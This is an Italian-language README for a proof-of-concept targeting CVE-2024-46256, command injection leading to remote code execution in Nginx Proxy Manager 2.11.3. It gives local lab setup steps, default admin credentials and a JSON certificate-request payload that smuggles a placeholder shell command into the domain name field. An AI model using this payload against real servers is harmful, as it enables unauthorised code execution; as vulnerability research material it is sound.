
CVE-2024-46256 strumento
docker-compose up -d
Oppure è possibile utilizzare lo script automatico:
python setup_environment.py
URL: http://localhost:81
Completare la configurazione iniziale, quindi procedere con il test
Accedere con l'account amministratore predefinito (email: [email protected] / password: changeme)
Verificare i permessi di accesso alle funzionalità relative all'emissione dei certificati
CVE ID: CVE-2024-46256
Prodotto: Nginx Proxy Manager
Versione: 2.11.3
Tipo di vulnerabilità: Remote Code Execution (RCE)
CVSS: Alto
Il PoC induce RCE tramite un utente autenticato che, nel processo di richiesta di emissione di un certificato (ad es. Let's Encrypt), effettua un'iniezione di template/comandi nel campo del nome di dominio.
Esempio di payload (esempio concettuale):
{
"domain_names": ["test.com\"||{command}||\\n test.com\""],
"meta": {
"dns_challenge": false,
"letsencrypt_agree": true,
"letsencrypt_email": "[email protected]"
},
"provider": "letsencrypt"
}
OS: Windows 10
Docker: versione più recente
Nginx Proxy Manager: 2.11.3